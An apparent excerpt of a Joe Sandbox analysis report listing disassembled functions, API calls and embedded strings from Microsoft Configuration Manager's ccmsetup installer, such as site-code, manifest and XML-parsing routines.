                                                                                            • Part of subcall function 005B3537: GetLastError.KERNEL32(?,?,?,?,?,REINSTALLMODE,00000001,?,REINSTALL,00000001,?,CcmSetup::ApplyDeltaLangChanges,00000001,00000000,00000001,00000000), ref: 005B35BA
                                                                                            • Part of subcall function 005B3537: GetCurrentThreadId.KERNEL32 ref: 005B35F0
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B4107
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Time$CurrentH_prolog3_catch_SystemThread$ErrorFileLast
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CreateCCMSetupRegistryTimeStamp(L"DeploymentFinished")$CreateRebootTimeStamp$DeploymentFinished$util.cpp$util.cpp
                                                                                          APIs
                                                                                          • SetSecurityDescriptorOwner.ADVAPI32(?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB40B
                                                                                          • GetLastError.KERNEL32(?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB415
                                                                                          • _free.LIBCMT ref: 005BB431
                                                                                          • GetLengthSid.ADVAPI32(00000002,?,?,00000000,?,00000000,?,005B1CD2,?,00000002), ref: 005BB443
                                                                                          • _malloc.LIBCMT ref: 005BB44D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: DescriptorErrorLastLengthOwnerSecurity_free_malloc
                                                                                          • String ID:
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 0061E0A2
                                                                                            • Part of subcall function 00609791: __EH_prolog3.LIBCMT ref: 00609798
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DE1
                                                                                            • Part of subcall function 005F0DBA: lstrlenW.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0DF1
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E04
                                                                                            • Part of subcall function 005F0DBA: TlsSetValue.KERNEL32(00000000,?,?,?,?,00000004,00571045), ref: 005F0E3D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: Value$H_prolog3H_prolog3_catch_lstrlen
                                                                                          • String ID: CcmUtilLib::IsSSLCapabilityPresent$Property[@Name="AuthMethod"] $Property[@Name="SSL"] $Property[@Name="SSLState"] $Value$Value
                                                                                          APIs
                                                                                          • __EH_prolog3_GS.LIBCMT ref: 006770B6
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6FE7: __EH_prolog3_catch.LIBCMT ref: 005F6FEE
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                            • Part of subcall function 005F4099: __EH_prolog3.LIBCMT ref: 005F40A0
                                                                                          Strings
                                                                                          • By default filtering out IF_TYPE_TUNNEL, xrefs: 00677284
                                                                                          • IPv6IFTypeFilterList, xrefs: 00677105
                                                                                          • Loaded IPv6IFTypeFilterList '%s', xrefs: 00677156
                                                                                          • Software\Microsoft\CCM, xrefs: 006770EA
                                                                                          • No IPv6 addresses will be filtered based on IF Type., xrefs: 00677240
                                                                                          • IF type '%u' will be filtered., xrefs: 006771BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Similarity
                                                                                          • API ID: H_prolog3$H_prolog3_catch$CloseCurrentH_prolog3_Thread
                                                                                          • String ID: By default filtering out IF_TYPE_TUNNEL$IF type '%u' will be filtered.$IPv6IFTypeFilterList$Loaded IPv6IFTypeFilterList '%s'$No IPv6 addresses will be filtered based on IF Type.$Software\Microsoft\CCM
                                                                                          • API String ID: 4177011481-3127954991
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006083ED
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006084FE
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::Normalize$pszPath && pszPath[0]
                                                                                          • API String ID: 2239685220-4123174800
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00598188
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 0063D4FE: __EH_prolog3_catch_GS.LIBCMT ref: 0063D505
                                                                                            • Part of subcall function 0063D4FE: GetCurrentThreadId.KERNEL32 ref: 0063D59B
                                                                                            • Part of subcall function 005B619E: __EH_prolog3_catch.LIBCMT ref: 005B61A5
                                                                                            • Part of subcall function 005B619E: GetCurrentThreadId.KERNEL32 ref: 005B6230
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Ccmsetup is called for upgrade/repair but failed to get local site code with error 0x%x. Will use specified or discovered site cod, xrefs: 0059828E
                                                                                          • SMSSITECODE, xrefs: 0059825B
                                                                                          • 0&l, xrefs: 005981F7
                                                                                          • Ccmsetup is called for upgrade/repair. Using the currently assigned site code '%s', xrefs: 0059823D
                                                                                          • Ccmsetup is called for upgrade/repair but client is not currently present. Will use specified or discovered site code., xrefs: 005982CF
                                                                                          • CcmSetup::PreserveSiteCode, xrefs: 005981A0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$H_prolog3H_prolog3_catch
                                                                                          • String ID: 0&l$CcmSetup::PreserveSiteCode$Ccmsetup is called for upgrade/repair but client is not currently present. Will use specified or discovered site code.$Ccmsetup is called for upgrade/repair but failed to get local site code with error 0x%x. Will use specified or discovered site cod$Ccmsetup is called for upgrade/repair. Using the currently assigned site code '%s'$SMSSITECODE
                                                                                          • API String ID: 3423034556-1158740678
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005F6472
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F6568
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\String.cpp$..\String.cpp$CCM::Utility::String::tokenize$szDelim && *szDelim
                                                                                          • API String ID: 958242921-1749164640
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 005AD1F7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005AD2A2
                                                                                          Strings
                                                                                          • msiutil.cpp, xrefs: 005AD2AA
                                                                                          • GetPackageCodeByUpgradeCode, xrefs: 005AD228
                                                                                          • msiutil.cpp, xrefs: 005AD292
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005AD29D
                                                                                          • GetInstalledProductInfo( szProductCode, sPackageCode, sProductVersion ), xrefs: 005AD298
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetInstalledProductInfo( szProductCode, sPackageCode, sProductVersion )$GetPackageCodeByUpgradeCode$msiutil.cpp$msiutil.cpp
                                                                                          • API String ID: 2239685220-3197176602
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005B7466
                                                                                            • Part of subcall function 0059E344: __EH_prolog3_catch.LIBCMT ref: 0059E34B
                                                                                            • Part of subcall function 005B6E52: __EH_prolog3_catch_GS.LIBCMT ref: 005B6E5C
                                                                                            • Part of subcall function 005B6E52: GetCurrentThreadId.KERNEL32 ref: 005B6F10
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005B74E0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$GetInstalledLanguages(mapLangs)$GetOrderedInstalledLangs$util.cpp$util.cpp
                                                                                          • API String ID: 1438242263-3129631628
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005F91ED
                                                                                            • Part of subcall function 005F954D: __EH_prolog3_catch_GS.LIBCMT ref: 005F9554
                                                                                            • Part of subcall function 005F954D: GetCurrentThreadId.KERNEL32 ref: 005F95F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005F9275
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catchH_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\util.cpp$..\util.cpp$CCM::Utility::CcmGetOSVersion$CcmGetOSVersionEx(osVerInfo)
                                                                                          • API String ID: 3531467662-2325366695
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00591360
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szValues.resize(0x2000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-2682175195
                                                                                          • Opcode ID: 7d754d02a05df5e5e76273dde3416590e8e608ef8c4052a8f94152730224e6b6
                                                                                          • Instruction ID: d81bef60e845ed6db13a030737dffca89a89ca24a66fc35c24306e1ce8b7686f
                                                                                          • Opcode Fuzzy Hash: 7d754d02a05df5e5e76273dde3416590e8e608ef8c4052a8f94152730224e6b6
                                                                                          • Instruction Fuzzy Hash: 3E21B470D04299EADF21EBA4CD8ABDEBE74BB91704F1444D9F00537181DB740B85CB61
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00591360
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szValues.resize(0x2000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-2682175195
                                                                                          • Opcode ID: 23d9db19ef7c641331637c0e7b674278a27b3890bea5ff13a6c1a23dcfa49fa2
                                                                                          • Instruction ID: d81bef60e845ed6db13a030737dffca89a89ca24a66fc35c24306e1ce8b7686f
                                                                                          • Opcode Fuzzy Hash: 23d9db19ef7c641331637c0e7b674278a27b3890bea5ff13a6c1a23dcfa49fa2
                                                                                          • Instruction Fuzzy Hash: 3E21B470D04299EADF21EBA4CD8ABDEBE74BB91704F1444D9F00537181DB740B85CB61
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005912E9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$(szSections.resize(0x1000) == true) != 0$LoadConfigFile failed with error 0x%x$`)l$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-4071032929
                                                                                          • Opcode ID: 8e5cf61035eadce0f9c2336256738f9a23b0f8c91429ab9b2e904cb899e1d413
                                                                                          • Instruction ID: f3157934ca67d8c7f98cbff4b2f38fec096ad84d04ef946e11af6c75ee3d7ad6
                                                                                          • Opcode Fuzzy Hash: 8e5cf61035eadce0f9c2336256738f9a23b0f8c91429ab9b2e904cb899e1d413
                                                                                          • Instruction Fuzzy Hash: 7321E170804289EADF21EBA4CD8ABEEBEB5BB92704F1484D9E10537181DB740B85CB61
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00608323
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608379
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::Path::IsRelative$pszPath != 0
                                                                                          • API String ID: 765742432-1819834485
                                                                                          • Opcode ID: 59c0bf8d20b26256189e8f406676c676be68058d1edc4f6131224312076b880d
                                                                                          • Instruction ID: 04c79b761f9ac4d134eaa5e2259099834dc2ae69045804f0ce1eb87fc2fe4171
                                                                                          • Opcode Fuzzy Hash: 59c0bf8d20b26256189e8f406676c676be68058d1edc4f6131224312076b880d
                                                                                          • Instruction Fuzzy Hash: 22113460AC4351EDCB29DBA4485ABEF7E619F91F50F188049F9C41B3C2CEB54A05C3A1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006490A7
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005FA66C: __EH_prolog3_catch_GS.LIBCMT ref: 005FA673
                                                                                            • Part of subcall function 005FA66C: GetCurrentThreadId.KERNEL32 ref: 005FA6F9
                                                                                          Strings
                                                                                          • LSIsSiteVersionCompatible : Site Version is not in the required format, xrefs: 0064920A
                                                                                          • CCM::LocationServices::LSIsSiteVersionCompatible, xrefs: 006490EF
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is not compatible., xrefs: 0064917C
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is compatible., xrefs: 006491BB
                                                                                          • LSIsSiteVersionCompatible : Site Version '%s' is not compatible., xrefs: 0064923E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch_$CurrentH_prolog3Thread
                                                                                          • String ID: CCM::LocationServices::LSIsSiteVersionCompatible$LSIsSiteVersionCompatible : Site Version '%s' is compatible.$LSIsSiteVersionCompatible : Site Version '%s' is not compatible.$LSIsSiteVersionCompatible : Site Version '%s' is not compatible.$LSIsSiteVersionCompatible : Site Version is not in the required format
                                                                                          • API String ID: 4241523842-2022239765
                                                                                          • Opcode ID: 67aae98bd2eac0d665a79839c5a2979adefe86a59b736e3242e7a1402dab2ab6
                                                                                          • Instruction ID: 5d97f2329b60aa3b5507a128edf74527565f2dae9050ebfbafe593cf02c920ee
                                                                                          • Opcode Fuzzy Hash: 67aae98bd2eac0d665a79839c5a2979adefe86a59b736e3242e7a1402dab2ab6
                                                                                          • Instruction Fuzzy Hash: CE5146B1C01359AADF10DFE8C889ADEBFB9BF49300F24416AE504AB241DB745A49CF61
                                                                                          APIs
                                                                                          • __EH_prolog3.LIBCMT ref: 005AA1E9
                                                                                            • Part of subcall function 006092DC: __EH_prolog3.LIBCMT ref: 006092E3
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005AA25C
                                                                                          • SysFreeString.OLEAUT32(?), ref: 005AA279
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Not a parse error, xrefs: 005AA305
                                                                                          • XML parsing error at line %u char %u: %s%s, xrefs: 005AA2DC
                                                                                          • X:\bt\1024777\repo\src\common\inc\ccmxml.h, xrefs: 005AA2C8, 005AA30B
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: FreeH_prolog3String$CurrentThread
                                                                                          • String ID: Not a parse error$X:\bt\1024777\repo\src\common\inc\ccmxml.h$XML parsing error at line %u char %u: %s%s
                                                                                          • API String ID: 2466513371-3031177609
                                                                                          • Opcode ID: adf9d214e931994d3ec7281b171273e43db44e5e92103b31949f05cd5260f2a9
                                                                                          • Instruction ID: 9862bba3a840c1ea632d87a213196de70138e544da7c56559d1b5ea9d3888673
                                                                                          • Opcode Fuzzy Hash: adf9d214e931994d3ec7281b171273e43db44e5e92103b31949f05cd5260f2a9
                                                                                          • Instruction Fuzzy Hash: 7F41377090020AAFCF15DFA4C889AEEBFB9BF59304F10405DE401B7292EB315A48CFA5
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005A827E
                                                                                          • Sleep.KERNEL32(?,00000002,?,?,?,00000008,?,?,InstallSelfExtractingEXE,00000030,0058F36E,?,?,?,00000001,?), ref: 005A8323
                                                                                          Strings
                                                                                          • Failed to install '%s' with retry-able error code 0x%x. Will retry in %d minutes., xrefs: 005A830A
                                                                                          • InstallSelfExtractingEXE, xrefs: 005A828A
                                                                                          • 0:l, xrefs: 005A82F3
                                                                                          • Failed to install '%s' with retry-able error code 0x%x. Retried with max count %d., xrefs: 005A8350
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catchSleep
                                                                                          • String ID: 0:l$Failed to install '%s' with retry-able error code 0x%x. Retried with max count %d.$Failed to install '%s' with retry-able error code 0x%x. Will retry in %d minutes.$InstallSelfExtractingEXE
                                                                                          • API String ID: 1566588488-3177027412
                                                                                          • Opcode ID: 193cb3ddf0253802bd16ea87ec32c18b14d11fef2767916c94325f689de43abd
                                                                                          • Instruction ID: e123d0cf07c63c588fd69d24e96f52521a0ca23445c29131d2685582ddb659df
                                                                                          • Opcode Fuzzy Hash: 193cb3ddf0253802bd16ea87ec32c18b14d11fef2767916c94325f689de43abd
                                                                                          • Instruction Fuzzy Hash: 3131897190024AEBCF11DF98CC49BEEBEB9BF55304F14841AF550A7291DB748A24DBA1
                                                                                          APIs
                                                                                            • Part of subcall function 005A8C4C: __EH_prolog3_catch_GS.LIBCMT ref: 005A8C53
                                                                                            • Part of subcall function 005A8C4C: GetCurrentThreadId.KERNEL32 ref: 005A8D17
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00585308
                                                                                          Strings
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00585303
                                                                                          • ccmsetup.cpp, xrefs: 00585310
                                                                                          • setupManifest.LoadXML( sFileManifest ), xrefs: 005852FE
                                                                                          • ccmsetup.cpp, xrefs: 005852F8
                                                                                          • Failed to load manifest file: %s. Error 0x%x., xrefs: 0058533D
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$Failed to load manifest file: %s. Error 0x%x.$ccmsetup.cpp$ccmsetup.cpp$setupManifest.LoadXML( sFileManifest )
                                                                                          • API String ID: 229633481-3453240775
                                                                                          • Opcode ID: 9960c1c76e56b9d98eb7e24495a87ab84e51e77d506b36e20fe9c58f17fba2fa
                                                                                          • Instruction ID: a82b061d5943d3763812d395eab5d1db892c699bfb0b115d219d16392595c021
                                                                                          • Opcode Fuzzy Hash: 9960c1c76e56b9d98eb7e24495a87ab84e51e77d506b36e20fe9c58f17fba2fa
                                                                                          • Instruction Fuzzy Hash: 9021AE31E44258EADB11EBA4CD4ABEEBEB4BF61700F244085F5417B281DBB41F09CB62
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C5091
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C50FB
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentH_prolog3_catchThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CCM::Utility::Stream::Seek$X:\bt\1024777\repo\src\common\inc\ccmcom.h$operator->()->Seek( liSeek, dwOrigin, &ulNewPos )
                                                                                          • API String ID: 765742432-682750979
                                                                                          • Opcode ID: 0d2e7842dde500faae8f77dd172d4a81708bc6047515e71fa439d8b112c0424b
                                                                                          • Instruction ID: e509e5a8c9e6733f29fd9c5053620c035b8dd978f910f17239c230c34b7bb80b
                                                                                          • Opcode Fuzzy Hash: 0d2e7842dde500faae8f77dd172d4a81708bc6047515e71fa439d8b112c0424b
                                                                                          • Instruction Fuzzy Hash: 7F11AC71A4174AAFCB11DFE98D0AFAE7EB1BF45700F184099B950AB381D6319A00DBA1
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 00625462
                                                                                            • Part of subcall function 00624884: __EH_prolog3_catch.LIBCMT ref: 0062488B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006254E2
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$CcmUtilLib::CcmIsCNG_Allowed
                                                                                          • API String ID: 4040336050-813724672
                                                                                          • Opcode ID: 8cc9ff06ee3ceb99ee47fbb0af449f6dbed5dd4c4fc23990501de3a99bf5b134
                                                                                          • Instruction ID: 0956adf097339dd984a646e9d34d9d8c53ba39f75a955eb3499d483f20108639
                                                                                          • Opcode Fuzzy Hash: 8cc9ff06ee3ceb99ee47fbb0af449f6dbed5dd4c4fc23990501de3a99bf5b134
                                                                                          • Instruction Fuzzy Hash: 96115BB1E80B66DBCB21EBA4C806BEDBEA56F50711F144015F901AB3C2CA784A418B91
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0057C4C1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0057C4C9
                                                                                          • ccmsetup.cpp, xrefs: 0057C4B1
                                                                                          • Digital signature verification has been disabled., xrefs: 0057C47F
                                                                                          • DetectIntuneClient(), xrefs: 0057C4B7
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0057C4BC
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$DetectIntuneClient()$Digital signature verification has been disabled.$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-1437044323
                                                                                          • Opcode ID: 3268f74eaa562b62fe7778b30524928fb0db6f61bd92253f2fb7b1e05c1802a3
                                                                                          • Instruction ID: c6fe76c11035fa2acbefe8bca3301f24b2cb64643e4ebd0b1b37779817f48424
                                                                                          • Opcode Fuzzy Hash: 3268f74eaa562b62fe7778b30524928fb0db6f61bd92253f2fb7b1e05c1802a3
                                                                                          • Instruction Fuzzy Hash: E701FCB194035555DF21FF60D81BAFE6EA7BF85B10F184049F644BB2C2CB68464093E5
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 0063C485
                                                                                            • Part of subcall function 005F094C: __EH_prolog3_catch_GS.LIBCMT ref: 005F0956
                                                                                            • Part of subcall function 005F094C: GetCurrentThreadId.KERNEL32 ref: 005F09AC
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                            • Part of subcall function 005F6BC9: __EH_prolog3_catch.LIBCMT ref: 005F6BD0
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: H_prolog3_catch$CloseCurrentH_prolog3H_prolog3_catch_Thread
                                                                                          • String ID: ADTimeOutSeconds$CCM::LocationServices::CcmGetADTimeOut$LocationServices$Software\Microsoft\CCM\CCMExec
                                                                                          • API String ID: 1536388851-2223030457
                                                                                          • Opcode ID: c1b297d1a6d3e53c3a29f1a270254b993b0eb412e4e176cba32a867a130b5e98
                                                                                          • Instruction ID: 316f18cc44031a013ec212cc7dcad5811cef8dfb4e722cc67cca6922c9919e46
                                                                                          • Opcode Fuzzy Hash: c1b297d1a6d3e53c3a29f1a270254b993b0eb412e4e176cba32a867a130b5e98
                                                                                          • Instruction Fuzzy Hash: 3B21E170D0528AE9DF01DBA9C8097EDBFB4AF15320F14804AF550B7282CBB80B09D791
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0058339D
                                                                                          Strings
                                                                                          • ccmsetup.cpp, xrefs: 0058338D
                                                                                          • ccmsetup.cpp, xrefs: 005833A9
                                                                                          • CoSetProxyBlanket( spJob2, 0xFFFFFFFFL, 0xffffffff , 0, 0, 3, 0, EOAC_DYNAMIC_CLOAKING ), xrefs: 00583393
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00583398
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$CoSetProxyBlanket( spJob2, 0xFFFFFFFFL, 0xffffffff , 0, 0, 3, 0, EOAC_DYNAMIC_CLOAKING )$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2882836952-1981958577
                                                                                          • Opcode ID: 62d234048a79fb7f431b60ac5da0b9970f032f4b3f05fd52574f7c5372c1a965
                                                                                          • Instruction ID: 02583cf844b5f72a00bb602e40f98f5424efdd44662e5c88ef245c0e650902af
                                                                                          • Opcode Fuzzy Hash: 62d234048a79fb7f431b60ac5da0b9970f032f4b3f05fd52574f7c5372c1a965
                                                                                          • Instruction Fuzzy Hash: 8AE09230688288E9DB10AB209E9AFB83E61BB16F04F0448C8B905791C29FA54685C311
                                                                                          APIs
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00583404
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: CurrentThread
